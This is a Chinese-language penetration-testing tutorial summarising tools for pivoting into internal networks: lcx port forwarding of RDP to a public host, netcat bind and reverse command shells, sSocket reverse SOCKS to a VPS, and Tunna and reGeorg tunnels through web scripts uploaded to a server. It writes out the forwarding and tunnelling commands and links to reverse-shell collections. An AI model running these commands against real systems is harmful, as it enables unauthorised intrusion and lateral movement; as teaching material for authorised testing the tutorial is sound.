# 内网渗透中转发工具总结

最近一段时间内网渗透做的比较多，刚好今天比较有时间，就总结一下内网中转发的一些工具的使用。这里主要介绍了lcx、nc 、sSocket、tunna、reGeorg几款平时用的比较多的工具，网络上也有很多关于他们的介绍，而且也非常不错，但是并没有统一起来，写这篇文章就算是一个小小的汇总吧。

0x00 LCX转发
==========

* * *

内网机器上执行：lcx.exe –slave 公网IP +端口 内网IP +端口

例如：`lcx.exe –slave 192.168.43.142 51 192.168.43.137 3389`

将内网(192.168.43.137)的3389端口转发到公网(192.168.43.142)的51端口

![p1](http://drops.javaweb.org/uploads/images/f485cc084981f52bd321227d463fb03a781c0a01.jpg)

然后在公网的机器上：

Lcx.exe –listen 监听51端口，转发到公网机器的3389端口

例如：`Lcx.exe –listen 51 3389`

![p2](http://drops.javaweb.org/uploads/images/0a44302980a46f643986b4b7cb5048900ac8b78c.jpg)

这个时候已经将内网的3389转发到了公网机器的3389端口，我们在本地机器上远程公网IP+3389 ，就连接上了内网机器的3389

![p3](http://drops.javaweb.org/uploads/images/79413a840e64afdc38eacc9e2fd00a7583608069.jpg)

0x01 NC 反弹CMDshell
==================

* * *

本机：192.168.43.142(win7) 远程机器：192.168.43.137(xp)

**正向连接：**

在远程机器上(t参数可以省略)

![p4](http://drops.javaweb.org/uploads/images/8f947e01902d64e575819184b918440dcb9f63fe.jpg)

在本地机器上

![p5](http://drops.javaweb.org/uploads/images/4916133dd75cad8421bd84095864bb62c16bf427.jpg)

成功之后，本地机器就获得了一个远程机器的shell

![p6](http://drops.javaweb.org/uploads/images/738883d5e38818c60bbceaf31661ac24f2beeb8a.jpg)

**反向连接：**

在本机运行上

![p7](http://drops.javaweb.org/uploads/images/0168cda852508fdcd862dda22d1e7a07c88dc329.jpg)

在远程机器上(t参数可以省略)

![p8](http://drops.javaweb.org/uploads/images/164a01c5175d0d1fbbf586fac8980e6025afdda0.jpg)

然后成功之后，我们在本地机器上看一下，已经获得了远程机器的cmdshell

![p9](http://drops.javaweb.org/uploads/images/9e94ac1af8fa3cf12d8618db0b5af97468ef6be2.jpg)

这里还有前人总结的十种反弹shell的方法，很不错

*   [http://zone.wooyun.org/content/5064](http://zone.wooyun.org/content/5064)(wb>5)
*   [http://www.waitalone.cn/linux-shell-rebound-under-way.html](http://www.waitalone.cn/linux-shell-rebound-under-way.html)

0x02 sSocket
============

* * *

一个socks代理工具套装，可用来开启socks代理服务，支持socks5验证，支持IPV6和UDP，并提供反向socks代理服务，即将远程计算机作为socks代理服务端，反弹回本地，极大方便内网的渗透测试。

下载地址：[https://sourceforge.net/projects/ssocks/](https://sourceforge.net/projects/ssocks/)

![p10](http://drops.javaweb.org/uploads/images/966e7f0b7ee9954f9a0328a57706475f2747b1ce.jpg)

先在vps 执行`rcsocket.exe –l 1088 –p 8888 –vv`, 监听1088端口

![p11](http://drops.javaweb.org/uploads/images/b0e52b73b893c93687b86b5c12592befd1c2ae82.jpg)

内网机器执行`./rssocks –vv –s 192.168.30.103:8888`(VPS)

![p12](http://drops.javaweb.org/uploads/images/bea0c145de44e5451b3f5bcd8baaa8cabe520b36.jpg)

成功，则会看到会话建立

![p13](http://drops.javaweb.org/uploads/images/024659ae234015fa6af9d06917fcaa7215b40469.jpg)

设置代理，让本机可以通过VPS的1088端口访问内网机器。

![14](http://drops.javaweb.org/uploads/images/68892da928bb69b87ae6ca4678e6dd68c7f45c39.jpg)

本机上 ssh 192.168.43.136内网主机

![p15](http://drops.javaweb.org/uploads/images/62d80e473a49c0b57e6c50fedd38a69d91da3bb2.jpg)

成功ssh到内网机器

![p16](http://drops.javaweb.org/uploads/images/14cdb0fc6ba860da1f8bcffc8e8758ef59fade91.jpg)

0x03 Tunna 正向代理
===============

* * *

[参考](http://drops.wooyun.org/tools/650)

`proxy.py -u http://xxx.com:206/test /conn.jsp -l 8888 -r 22 -v -s`

![p17](http://drops.javaweb.org/uploads/images/7d1c085d05245f5d26d7ddf4ecef8bceef8cdc04.jpg)

然后在xshell中执行  
ssh 127.0.0.1 8888,看到下面的样子，说明已经成功了

![p18](http://drops.javaweb.org/uploads/images/7b2fa31f81ab9a9d344f668885fab6a17a05f98c.jpg)

![p19](http://drops.javaweb.org/uploads/images/5a4c39daade2d79f7eaacc9f0abcc37e014ce416.jpg)

同样的，如果内网的机器是windows，就把3389转出来

`proxy.py -u http://xxx.com:206/test /conn.jsp -l 8888 -r 3389 -v`

其中几个参数的解释：

*   -l 表示本地监听的端口
*   -r 远程要转发的端口
*   -v 详细模式

另外，如果脚本传到了内网A机器上，但是想登录内网B机器，那么可以-a参数指定机器

将内网中172.16.100.20主机的3389转发到本地  
`python2.7 proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -a 172.16.100.20 -r 3389`

0x04 reGeorg+proxifier 正向代理
===========================

* * *

reGeorg是reDuh的继承者，利用了会话层的socks5协议，效率更高一些。这也是平时用的比较多的工具。

先将reGeorg的对应脚本上传到服务器端，直接访问显示“Georg says, 'All seems fine'”，表示脚本运行正常

![p20](http://drops.javaweb.org/uploads/images/a39b91b674703e83e04b1f5c863b7aa90b26e292.jpg)

运行`python reGeorgSocksProxy.py -p 8888 -u http://www.xxx.com/tunnel.php`

![p21](http://drops.javaweb.org/uploads/images/15d3dd5bba57b1aafeaa8a380b1d1ba9f41da3ee.jpg)

将proxifier打开，在Proxy Server中这样配置

![p22](http://drops.javaweb.org/uploads/images/b6d68489f509473379370b8bb1ed3d8b6c74b753.jpg)

![p23](http://drops.javaweb.org/uploads/images/6839094e69de1ee7c0170db5e6d8e3fd95447d34.jpg)

然后就可以在本地访问内网的机器了

![p24](http://static.wooyun.org//drops/20160429/2016042903552840012.png)

成功3389到内网机器

![p25](http://drops.javaweb.org/uploads/images/70befdf66a0867f5fbc92214d6566251c7f417de.jpg)